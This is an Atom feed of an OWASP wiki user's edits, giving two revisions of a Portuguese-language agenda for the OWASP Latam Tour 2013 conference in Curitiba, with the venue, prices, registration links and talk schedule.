<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wagner.elias</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wagner.elias"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Wagner.elias"/>
		<updated>2026-04-27T20:22:06Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=148216</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=148216"/>
				<updated>2013-03-20T15:00:54Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | U$S 300 não membro / U$S 250 membro OWASP &amp;lt;br&amp;gt; Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt; '''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]''' &amp;lt;br&amp;gt; https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.Para se registrar acesse o seguinte link : &amp;lt;br&amp;gt; '''[http://www.regonline.com/Register/Checkin.aspx?EventId=1212754]''' &amp;lt;br&amp;gt; http://www.regonline.com/Register/Checkin.aspx?EventId=1212754 &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 - 19:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Abertura do Evento&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Docente da Universidade Positivo&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Breve apresentação sobre a instituição&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:15 - 20:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | OWASP: Quem somos e o que fazemos?&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Wagner Elias&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Uma visão geral sobre o projeto OWASP e suas principais iniciativas&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 - 20:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Desafios, Tendências e Inovações em Segurança de Aplicações&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Rafael B. Brinhosa&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |20:45 - 21:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |Coffe-Break&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:00 - 21:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Entendendo como funciona um Web Application Firewall&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Rodrigo Montoro&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:45 - 22:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Emissão de certificados digitais – a perspectiva do usuário final&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Bruno Ribeiro e André Ortiz&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 22:30 - 23:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Convidados&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate e Encerramento do Evento&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=148165</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=148165"/>
				<updated>2013-03-19T16:08:43Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | U$S 300 não membro / U$S 250 membro OWASP &amp;lt;br&amp;gt; Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt; '''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]''' &amp;lt;br&amp;gt; https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.Para se registrar acesse o seguinte link : &amp;lt;br&amp;gt; '''[http://www.regonline.com/Register/Checkin.aspx?EventId=1212754]''' &amp;lt;br&amp;gt; http://www.regonline.com/Register/Checkin.aspx?EventId=1212754 &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
